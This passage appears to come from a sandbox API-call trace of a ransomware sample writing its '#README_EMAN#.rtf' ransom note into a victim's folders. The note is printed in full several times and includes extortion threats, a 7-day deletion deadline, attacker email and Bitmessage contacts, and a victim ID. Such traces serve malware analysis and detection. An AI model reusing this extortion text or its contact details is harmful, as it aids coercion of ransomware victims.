th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245d7a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x04þV\\Á\x1aþ®×\x09ãox21'­_&¶jD\x8dÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0297.273] WriteFile (in: hFile=0x2f4, lpBuffer=0x245d7a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245d7a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.274] CloseHandle (hObject=0x2f4) returned 1 [0297.274] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0297.274] GetLastError () returned 0x2 [0297.274] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0297.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n 